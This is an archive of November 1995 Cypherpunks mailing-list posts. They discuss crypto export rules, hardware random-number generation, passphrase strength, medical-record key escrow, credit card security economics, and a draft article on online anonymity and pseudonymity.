-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKooW/gyLN8bw6ZVAQFMAQP+MQn6wlKxMVHekN1mruUrwILBR0KTcxSK
RQo7ELRJAP0aEiEskio3bphrgCpWgxKHJn9KP3YEHuNbwwXZGVzVTlijvzmbVksf
ybtAsspMERb/9yWOe4AT69R/hSTAjEkzCwx86iP4FbjBccPiQPQD1eKJ+4C4obW+
WFuq7mpizeU=
=J6UH
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 16 Nov 1995 03:32:09 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <m0tFUJh-00091rC@pacifier.com>
Message-ID: <199511151908.OAA05536@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>(1), (2), (3), (4) and (5) of this category;"
>
>Question:  What makes computers in general NOT describable by such a
>paragraph?!?

The referenced paragraphsdescribe cryptographic hardware, software and
technical data.  Computers in general are not "specifically designed"
as cryptographic equipment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 16 Nov 1995 02:51:47 +0800
To: cypherpunks@toad.com
Subject: So. FL Cypherpunks Keysigning/Party
Message-ID: <199511151832.NAA33898@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greetings South Florida cypherpunks--

        All cypherpunks in or near Dade county who wish to meet will be
getting together at 7:30PM on Wednesday, November 29th. In keeping with
past South Florida cypherpunks tradition, we are going to meet where the
_beer_ is, and (better yet!) this South Florida cypherpunks meeting will
coincide with the monthly meeting of the Miami Area Society of Homebrewers
("M.A.S.H.") at the Abbey Brewing Company on Miami Beach. This bar serves
a selection of barsnacks, not quite as extensive as the food at The
Riverwalk Brewery, but at least they aren't going out of business...

Location:
The Abbey Brewing Company  (305) 538-8110
1115 16th Street, Miami Beach

Directions:
[From North: Take I-95 South to 195 exit, over to the beach, and go South
on Alton Road. Look for a green sign that says "BAR" atop the building.]
[From South: Take I-95 North to 395 exit, over to the beach, and go North
on Alton Road. Look for a green sign that says "BAR" atop the building.]

        I will be bringing the videotape of the "Mitchells In The Morning"
talkshow featuring PRZ that I mentioned a while ago, but The Abbey has no
VCR, and the atmosphere might not be right for a showing.
        Because the meeting is on Miami Beach, folks from far away are
urged to carpool or use Tri-rail to Metrorail and then get a ride from
Jim Ray (I will try to stay *somewhat* sober). e-mail <liberty@gate.net>
for ride or carpool details & I'll try to coordinate the transportation
aspect of the meeting for those in need of a ride.
        Joe Block <jpb@miamisci.org> is willing to coordinate the
keysigning aspect of the meeting, and he will post in a few days.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKoxZm1lp8bpvW01AQHLywP/YUWrjYBGyhTXVNyJa05WrUZPtZcNx2sK
e6Q0Zc4CYm2q3y5Xq2jdOz8pql95y2L/anSNAJS3zdAR4SFpGR45ZxNtLXy1YU6r
6KDCwPpjoJ4+aUdXrfcW/2DR3BMatHIy25I26SqWmwiVSFRvjIBEH9PO73QA9c7Z
Yo5nKaDvRu0=
=oRZQ
-----END PGP SIGNATURE-----
Regards, Jim Ray

"...the politicians have been arguing over whether to increase the
   budget enormously or just hugely. The news media refer to this
   process as 'cutting' the budget." -- Dave Barry

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 16 Nov 1995 03:29:28 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Hardware-random-bits interface
In-Reply-To: <accf76ef010210049425@[205.199.118.202]>
Message-ID: <199511151905.OAA08439@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> But if you "shield the bejeebers out of it," then all the radio receiver
> generates is whatever signal manages to sneak through--which, ironically,
> would make it _easier_ for an outside attacker to drive--and some amount of
> internal receiver/amplifier noise, such as the Johnson noise talked about
> here. (Every receiver has an "equivalent noise temperature," recall.)
> 
> And if one is left with only internal noise, why not simply use a nice
> clean source like a Zener diode?

Quite solidly agreed. Internal noise beats external noise, and there
is no point in using a radio receiver when what you want is internal
noise.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 16 Nov 1995 06:51:35 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511152225.OAA07154@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>Does anyone know the ostensible justification for this?  

Isn't the NCSA government-funded?  If so, they've probably got
less slack in what they can get away with than private citizens;
the NSA's got more leverage over their funding, especially if
"Supercomputer Applications" are often military or civilian-govt.
Not only do they have to worry about ITAR as law, they have to
worry about their continued cash flow.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 16 Nov 1995 06:50:48 +0800
To: cypherpunks@toad.com
Subject: Re: Repeated Words/characters in Password/Phrase
Message-ID: <199511152225.OAA07177@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words?  And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this.  Thanks.

As always, it depends on the attacks people can make on your system.
For Unix password files, the cyphertext is often available, the plaintext is
known,
and the key (your password) is known to be eight or fewer characters.  
If there's reasonable suspicion that your password contains multiples of one 
or more characters, and that they're mostly letters, you're toast against a 
good brute-force attack, because the search space is fairly small.
Using, say, a pair of 4-letter words is an even worse idea...

For PGP passphrases, the cyphertext is generally unavailable, but assuming
you're dealing with Bad Guys resourceful enough to try to crack your passphrase,
they've probably got the file.  The plaintext may be partially known (PGP data
files have some structure; RTFM to find out how much) and partially unknown 
(your secret key) but guesses can be validated (slowly).  The structure of the 
IDEA key is that your passphrase is hashed by MD5, and the 128-bit output
used as an IDEA key to encrypt the formatted secret key.  Since brute-forcing
IDEA with the 128-bit MD5 output is unrealistic, the alternative is to feed
candidate keys through the whole process.  So how much entropy does your
passphrase have,
and how many guesses are they willing to attempt?  How much does word-repeating
affect it?  How much entropy depends on your taste in passphrases, your
creativity,
and how much you're willing/able to memorize without resorting to writing it
down.

The MD5 effectively limits entropy to 128 bits, but you can cram as much as
you want
into the passphrase and MD5 will crunch it all down, so repeated words can only
cause problems if they make you decide you've got enough entropy in the
passphrase
before you do.  If your passphrase is "FOO BAR", and you're known to be a
programmer,
lengthening it to "FOO FOO BAR BAR BAR Skidoo" may improve it some, though
it's not
as good as "Eric Woodruff Kintetsu Espada 1145 Lutheran", to pick six words
drawn
randomly from the Tri-Valley phone book.  But if you eliminate obvious material,
and word-doubling lets you pick a more complex passphrase than you might
have otherwise
used, go ahead - it's not going to make the MD5 any more attackable.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:13:15 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFpbT-0008yaC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>jim bell writes:
>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>(1), (2), (3), (4) and (5) of this category;"
>>
>>Question:  What makes computers in general NOT describable by such a
>>paragraph?!?
>
>The referenced paragraphsdescribe cryptographic hardware, software and
>technical data.  Computers in general are not "specifically designed"
>as cryptographic equipment.

Great!  Then you must merely ensure that there is at least one
(non-encryption) program around that can use the same hooks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Date: Thu, 16 Nov 1995 04:13:40 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <199511151943.OAA01845@blue.seas.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why 
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
> 

	Precisely.  It reminds me of a talk given by Dr. John McQuilan
(I think it was at one of his High Performance Networks Conferences) where
he said that the big administrative headache for high speed networks vs.
low speed networks was simply the speed with which you could get in 
trouble.....  The analogy holds quite true in physical credit cards vs.
net credit....

------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:28:27 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Hardware-random-bits interface
Message-ID: <m0tFpnk-0008yDC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > And if one is left with only internal noise, why not simply use a nice
>> > clean source like a Zener diode?
>> 
>> Quite solidly agreed. Internal noise beats external noise, and there
>> is no point in using a radio receiver when what you want is internal
>> noise.
>
>It may have been misleading to refer to a radio receiver chip:  the
>noise generated by the chip will be entirely internal.  It doesn't
>depend on any external signal "sneaking in"; the noise comes from
>the effective resistance of the first amplifier stage.  Nothing
>is being "received", in some sense; it's just a big hunk 'o gain.
>
>A Zener diode would be fine, but the design is a bit more complex,
>especially for wide bandwidths---you need to mess with biasing
>voltages, speedy op-amps, interface to CMOS, and all that jazz.
>You'd need external power (or a DC-DC converter).  I wanted a
>super-simple design that people could just plonk down on a PC
>board.  Two chips and some bypass capacitors.

Why not do both?  A Zener is supposed to be a relatively high-level source
of white noise, up to some upper bandwidth, so you could just feed the Zener
voltage (through a blocking cap, if necessary) to the radio receiver input.

See, you and the chip manufacturer are working at crossed purposes:  a radio
receiver chip is SUPPOSED to be a low-noise device.  For your purposes, you
WANT it to be a high-noise device, to minimize the significance of external
noise.  Since the radio receiver chip does some things you want (gain, maybe
AGC), but doesn't necessarily add an adequate amount of noise, a zener would
be an excellent addition.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Thu, 16 Nov 1995 04:32:34 +0800
To: cypherpunks@toad.com
Subject: Re: MED_vac
In-Reply-To: <199511151823.NAA02794@hidden-foes.gateway.com>
Message-ID: <199511152004.PAA05104@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young <jya@pipeline.com> writes:
>
>   11-15-95. NYPaper Page One:
>
>   "When Patients' Records Are Commodities for Sale."
>
>      Individual medical records, carrying more sensitive
>      personal information than ever before, are increasingly
>      being gathered and stored by the tens of thousands in
>      commercial databanks maintained by institutions like
>      hospital networks, health maintenance organizations and
>      drug companies. And although there is a Federal law that
>      protects the privacy of video rental lists, private
>      medical information is being bought and sold freely.

     A (possibly stupid) thought: could commercial key escrow help here?

     I very much want hospitals to have fast access to my medical data if
my broken and bleeding body should come through their door, even if I am
unconscious and my personal physician cannot be reached. On the other hand,
I don't want anyone to be snooping through them right now.

     One solution is for me to carry my records around with me on a
smartcard or some such device. But there are problem with that approach;
for example, do I want that personal information to be in my wallet if it's
stolen? Do I want to add another item to the list of physical items I have
to keep secure?

     So, what if my records were available on the net, but encrypted with a
an key known to my physician and an escrow agency? (Equivalently, they
could be on that smartcard, but encrypted.) If an emergency occurs, the
hospital fetches my encrypted records from my physician's server, then
sends a message (signed with the hospital's key) to Keys R Us, the escrow
agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
Inc., insurance card lists my physician's server, the escrow agency, and my
patient number.)  Keys R Us verifies the message and sends the key.
Perhaps there's also an alias to notify of the release, one that reports to
but is not traceable to my physician or me.

    Keys R Us only has a number and a key; they don't know who my physician
is and therefore don't know where to find the actual records.  Anyone who
gets my insurance card can find the records, but has to convince Keys R Us
to release they key; and if I've done my homework in picking the agency,
they won't.

     Does this give an advantage over just having a copy of my records kept
by a trusted third party? Maybe so; I think maybe less trust of the escrow
agency is necessary. No snooper can slip someone at the escrow agency a
couple of cyberbucks to get a copy of my records, unless they've managed to
match "FooBar Medix, Inc. patient number 147258369" with "Tom Swiss" and
the location of my physician's server. (What if FooBar Medix, Inc., lets
this information out? I dunno. I guess I visit their office with a
shotgun. Better idea: FMI doesn't know what escrow agency I use. I fill in
Keys R Us on the card myself.) No minimum wage slave can just casually
browse my records for fun.

     Thoughts?

     [Since TIS is in the CKE field, I should note that this is my own
boneheaded idea, not affiliated with the company in any way.]

-Tom Swiss / tms@tis.com 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 16 Nov 1995 08:41:23 +0800
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
Message-ID: <199511160021.QAA06782@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Mark C. Henderson wrote:

> On Nov 14, 16:47, s1113645@tesla.cc.uottawa.ca wrote:
>> Subject: CSE gets flak on TV
>> For those who care, the Communications Security Establishment has been
>> getting some flak for spying on Mex. during NAFTA talks and on Korea to
>> help us sell Can. nuke reactors:

The CSE deserves all the flak that it can get ... especially the village
idjit in "LMN Group", Barry de 'Artful.  Gee is he full of it.  His phone
manners are atrocious, especially for someone *supposedly* in customer
relations. 

I mean are these guys on their toes, or what??  I guess he was just trying
to do a bad Lily Tomlin impression, or they're having a really bad day
over there.  My mistake for demonstrating a willingness to talk.  It 
really was a waste of a quarter.

I guess that I'm not supposed to taunt the poor people at the CSE via
STU-III.  I guess I should have used POTS.  I mean Motorola's STU-III
can't be spoofed, can it??  Especially when we go into SECURE MODE?? 

(btw, that's STRIKE THREE to my Ottawa friends ...)

> Folks who are interested in the CSE should also check out the
> "unofficial CSE home page" at

Hmm, I think they mispelled some stuff on this page.  

It's STU-III ... not STY-III ... guess someone's finger slipped up on the
Y and the U, or something.  Then again, maybe we should be specing Alcatel
over Motorola.  Fewer chances for miscommunications. 

Or maybe Motorola has a couple of new products coming out. I'll bet
whatever they are, they ain't Marrons Glaces, or Beaujolais Villages. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:08:43 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511160025.QAA08644@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for all who wrote with help re: FAQ file!  I now
have several other sources from which to download the
file.  Looks pretty interesting....

Cassiel






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com
Date: Thu, 16 Nov 1995 09:16:09 +0800
To: cypherpunks@toad.com
Subject: Re: Repeated Words/characters in Password/Phrase
Message-ID: <v02130505acd00385c158@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>In the real world, where passphrases must be memorized, "long and random"
>is an elusive goal, which has to be weighed against the risk of other
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>attacks (such as capturing keystrokes with a sofware monitor, or from afar
 ^^^^^^^
>with a van Eyk antenna, etc.).
>
>Me, I use a nonsense phrase which has meaning to me, with a few garbage
>characters added to confuse things further. I don't think my passphrase is
>the weak link.
>
>- --Tim May

This is, of course, very good advice.

Passphrases need only be as strong as every other component of the security
system. I'd add that there is a moderately good reason to keep the passphrase
_only_ as strong as every other component of the system for psychological
reasons.

The passphrase is what the user tends to think of when they think of their
system. Even if that user is the designer of the system, a false sense of
security an be an easy thing to develop. At a past place-of-work, someone
there who prided themselves on using difficult passphrases was bitten pretty
severely by a faulty .forward file.

DES provides similar lessons - searching 56 bits of keyspace requires just
barely less effort than that required to launch other attacks on the algorithm
(in theory, at least). The system is, as far as anybody knows, secure, and no
part of it is significantly more secure than any other.

-j

--
On the internet, nobody knows you're a diety.
_________________________________________________________________
Jamie Lawrence                                <foodie@netcom.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert A. Hettinga) (by way of rah@shipwright.com (RobertHettinga))
Date: Thu, 16 Nov 1995 06:22:22 +0800
To: www-buyinfo@allegra.att.com
Subject: Size of the internet economy?
Message-ID: <v02120d00acd0125e6d8b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Lately, I heard (somewhere) that $250 million changed hands directly on
the net in 1994, mostly credit cards.

Is this a real number? Where did it come from? What are estimates for 1995?

Cheers,
Bob Hettinga

--
Robert Hettinga <rah@shipwright.com>
e$
44 Farquhar Street
Boston 02131
617-958-3971
"Reality is not Optional" -- Thomas Sowell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Thu, 16 Nov 1995 06:48:13 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <Pine.HPP.3.91.951115165438.20268D-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 Nov 1995, Vladimir Z. Nuri wrote:

> 
> Arley Carter <ac@hawk.twinds.com>
> 
> >This may be a stupidly obvious question but..... 
> >We could argue until the cows come home, hell freezes over or the Cubs win
> >the World Series, what ever comes first ;-) about whether giving your credit
> >card number to a waiter or an 800 # clerk is any more or less secure than
> >transmitting it encrypted or clear text over a data link.
> >
> 
> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why 
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
> 
In my post I am looking at this from an economics point of view. Simply
put: If there is unlimited liability to the credit card holder because
Mallet is stealing card numbers from the telco switch, encyrpted, plain text,
it doesn't matter, there will no users.  If there are no users then
there will be no transaction fees generated, no transaction fees, then it
won't be deployed.  Therefore, there is no reason to develop the code 
or even read the latest and greatest specs. and we are all wasting out 
time.  

We must recognize that no matter what code we write, how secure it is,
it won't be used until the banks that must clear the transactions
agree to accept the risks of loss in return for their transactions fees.
I haven't seen this from any of this consortiums and would like besides 
publishing their specs for the best system agree that this risk bearing
is a necessary step for electronic commerce to become a reality.

I would like to see members of the MasterCard and Visa coalitions comment 
on this aspect of the systems that are promulgating.  The one who cracks
this nut first without losing their shirt to Mallet will be the winner. The
others that expect us to deploy systems based upon if Mallet breaks the 
system, the cardholder and or merchant pays is wasting our time. 
MasterCard/Visa,  you're going to have to *earn* those transaction fees in
cyberspace.

>From the card holder's point of view all he cares about is that he can't 
lose money from using his card.   

For anybody else that wants to argue about what is more dangerous,
restaurant dumpsters or telco switches, take it to alt.who.the.hell.cares.


Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:53:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511160125.RAA02384@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi All

You were all so helpful with my last request, I figured
I would go for broke and ask for more advice.

The physical security of my computer isn't really that great,
so I've been interested in finding utilities that would 
securely delete the files I want deleted (as well as temp
files created, etc.).  I run Win 3.1 on DOS 6.  What do 
people think is the best free/shareware file wiping utility
(now, there's a Freudian name...) out there?  How about for
deleteing that pesky Windows Swapfile?   I know--best of all
worlds I remain in DOS, but this isn't always practical.  Any
advice would be appreciated.

Please cc me directly in your response as I've moved over to
Cypherpunk-lite.

Thanks again!

Cassiel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 16 Nov 1995 10:07:03 +0800
To: cypherpunks@toad.com
Subject: Anonymity and Intellectual Capital
Message-ID: <199511160148.RAA18908@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is a draft article by David Post of Georgetown Law Center.  He
offered it on the Cyberia list and it includes permission to
redistribute.  I thought it had some interesting ideas on anonymity and
pseudonymity, as well as our old bugaboo "reputation capital".  I have
reformatted it slightly to improve readability but made no changes to the
content:


Pooling Intellectual Capital: Anonymity, Pseudonymity, and
Contingent
Identity in Cyberspace    

DRAFT OUTLINE
October 31, 1995
David G. Post [NOTE 1]

	  Most discussions of "anonymity" in cyberspace focus on
whether or not to regulate the availability of "untraceably anonymous"
messaging functions -- anonymous remailer services and the like -- and
the related question of how, in the special circumstances of
cyberspace, one might accomplish such regulation).  To be sure, this is
an important perspective; although we are embedded in a world in which
anonymous transactions are pervasive, we have never before been able to
manipulate anonymity, or to undertake as wide a range of anonymous
transactions, as cyberspace allows us to undertake (and we have,
therefore, only begun to think about the implications of being able to
do so).  At the same time, however, the technology offers, it would
seem, new prospects for eliminating anonymous communication, i.e., for
requiring (and enforcing the requirement for) completely "traceable"
communication.

     We need, in the first instance, to understand more about the costs
and benefits of anonymity in this new environment before we can
sensibly talk about the best way to regulate it (or whether to regulate
it at all).  Harms associated with an anonymous messaging  regime
include, notably, the inability of "law enforcement" (broadly defined
to include both public and private enforcement) to obtain information
on persons responsible for harm perpetrated by individual actors;
benefits include the ability of individuals to engage in communicative
activity without putting any aspects of their "identity" at risk (see
below for additional discussion of the reasons for the quotation marks
here).

	  My thesis here is that, because of the close links
between anonymity and pseudonymity in cyberspace, new elements need to
be added to this equation -- primarily on the benefits side.  This
requires disentangling, at the outset, three related concepts:
anonymity, pseudonymity, and traceability.  We can define an
"anonymous" communication as one in which the message itself contains
(and hence the recipient of the message receives) no information
regarding the identity of the sender.[NOTE 2]  Although there can be
truly anonymous messages even in this strict sense -- messages
containing no information about the originator -- it makes more sense
to talk about anonymity as a continuous rather than a binary attribute
(present/absent) of messages:  even messages we ordinarily think of as
"anonymous," after all, contain some information about the author
(e.g., graffiti scrawled on a subway platform informs us that the
author was literate, and was geographically located in a certain place
within the last x months/years, all of which probably effects a
significant reduction in the reader's uncertainty about the identity of
the author by ruling out the vast majority of individuals in the world
as possible authors).

     Messages, however, rarely contain a fixed amount of information
about the sender's identity; [NOTE 3] the degree to which a message may
be considered "anonymous" is rarely (if ever) an inherent
characteristic of the message itself.  Relevant information about the
originator's identity may well often be available, but only at some
additional cost.  For example, an "anonymous" note slipped under the
door may be covered with fingerprints from which, were we able easily
to access both a fingerprint reader and the FBI's fingerprint database,
we could obtain significant information about likely originators.
"Traceabililty" measures the cost of obtaining information about the
identity of the sender in addition to the information that is "readily
apparent" -- i.e., obtainable at (virtually) no cost -- from the
message itself.[NOTE 4]

	  Finally, we can define a pseudonymous message as one
that contains information (of varying reliability, to be sure) about
the identity of the originator -- the cognizable entity responsible for
transmitting the message -- without simultaneously providing
information about the actual, biological, individuals responsible for
transmission of the message.  Pseudonymity, like anonymity, shields
aspects of the identity of the "real" actor from view; information that
a book was written by "Mark Twain" by itself gives you no more (or
less) information about the true identity of the author than does the
information that it was written by "Anon." Indeed, if Samuel Clemens
had chosen to publish each of his novels under a different pseudonym,
that would have been the essential equivalent of publishing all of the
novels under the pseudonym "Anon.," or "John Doe." Pseudonymity allows
each message to carry additional information, cumulative over time,
about the pseudonymous actor; i.e., the difference between pseudonymity
and anonymity is that the former, but not the latter, allows the
accumulation of reputational capital in the pseudonymous entity.  The
use of the a single pseudonym "Mark Twain" allowed Clemens to invest a
single entity with reputational capital, built up over time and across
different novels; "Anon." will not serve that purpose, primarily (if
not exclusively) because it is unprotected and used by any number of
other authors (many of whom might not be quite as talented as
Clemens).[NOTE 5]

	  In other words, pseudonymity, like anonymity, allows
individuals to act without putting at risk any aspects of their own,
personal identity (including their physical assets, reputational
capital, financial capital, and the like); pseudonymity differs,
however, from anonymity in that it allows the accumulation of
reputational capital in the pseudonymous entity.  Both anonymity and
pseudonymity are thus forms of "limited liability," and the extent to
which they serve that function effectively is determined, in both
cases, by whatever traceability requirements are imposed.  To
illustrate, take the extreme case, e.g., a requirement that all
messages contain certain information about specified aspects of the
originator's "identity."  This would not only eliminate anonymous
messages (at least to the extent it could be enforced), but it would
make certain forms of pseudonymity effectively unavailable as well; the
reputational capital belonging to "Mark Twain" and to "Samuel Clemens"
would be identical, and whatever aspects of Clemens' identity had to be
revealed would no longer be shielded in the course of any transactions
in which "Mark Twain" was involved.

     Most discussions of "the regulation of anonymity in cyberspace"
are really discussions about traceability requirements.  The potential
benefits and harms that accompany an anonymous messaging regime are
directly related not to the availability of "anonymity" per se, but to
the availability of untraceable anonymity.  I know of no serious
proposals, for example, to prohibit individuals from leaving their
electronic mail messages unsigned; the hard questions all concern the
nature of the traceability requirements that will be put in place in
regard to those messages, i.e., how easy or difficult will it be for
the recipients of such messages, third parties, or law enforcement
officials, to obtain additional information about the identity of the
message originator.

	  But traceability requirements will have an impact --
possibly a profound impact -- not merely on the availability of
anonymous communication, but on the availability of pseudonymous
communication as well. For example, a sufficiently high degree of
traceability eliminates both anonymous and pseudonymous messages;
requiring all authors to provide information about their "real"
identity not only makes it impossible for them to communicate
anonymously, it is, in effect, impossible for them to communicate
pseudonymously as well.  Analyzing the consequences of a "ban on
anonymity" in cyberspace needs to take more than the benefits and costs
of anonymous messaging into account; it needs to be evaluated in light
of the benefits and costs of pseudonymous communication as well,
considerations that have received less attention from those looking at
these questions. So the question "what is the best traceability
requirement to apply to electronic communication" needs to consider not
only the harms and benefits flowing from anonymous communication but
these additional considerations as well.

	  Because all communication in cyberspace is entirely
machine-mediated -- i.e., because the "identity" of the relevant actors
in a biological sense is necessarily at one remove from the
communication itself -- everyone acts "pseudonymously," at least in the
sense that you can only be identified by a stream of bits when you act
in cyberspace [NOTE 6].  The prospect for more creative uses of
pseudonymous action -- the ability for individuals to pool their
individual intellectual capital with great flexibility and with very
low start-up or transactions costs, into a wide range of new kinds of
actors and entities, each capable of accumulating reputational capital
-- is a profound and exciting feature of this environment.[NOTE 7]

	       The "limited liability" metaphor now becomes a bit
more useful.  Just as limited liability in the corporate context was
designed to encourage the pooling of physical and financial assets into
corporate entities, assuring investors that their personal assets would
not be placed at risk, so, too, should protection against traceability
(i.e., protection for pseudonymous action) encourage "investors" to
pool their intellectual capital into pseudonymous entities, assuring
those investors that only the reputation of the pseudonymous actor, and
not their own personal assets, are at risk when the entity acts.

     This approach probably answers none of the hard questions about
the proper scope of regulation; it may, hopefully, lead to a
consideration of those questions that need to be answered before any
regulatory actions are undertaken.  If there are benefits to be gained
from the actions of these entities -- if the pooling of intellectual
capital into entities leads to new and valuable forms of intellectual
undertakings (itself a question open to discussion) -- we should seek
to design our rules of limited liability to simultaneously induce
"investors" to form these new entities while minimizing the costs that
may be associated with their formation?  Analyses of corporate limited
liability are useful analogues for this inquiry; when should "piercing
the veil" of pseudonymity be permitted or required? Can we disaggregate
the various aspects of personal identity that should receive more, or
less, protection from disclosure?

************************************************

NOTES.

	  1.   Visiting Associate Professor of Law, Georgetown
University Law Center, and Co-director, Cyberspace Law Institute.
Email:  Postd@law.georgetown.edu or DPostn00@counsel.com.  Permission
is hereby granted to freely copy and distribute this paper; please
retain the "Draft" designation as well as attribution to the author.

	  2.   I use "information" in the information-theoretic
sense, in which information is measured as a reduction in uncertainty;
that is, a message that contains information about the identity of the
sender is one that, by definition, lowers the recipient's uncertainty
concerning the identity of the sender.

	  3.   "Identity," of course, is not a static,
context-less piece of information, but is, rather, a complex cluster of
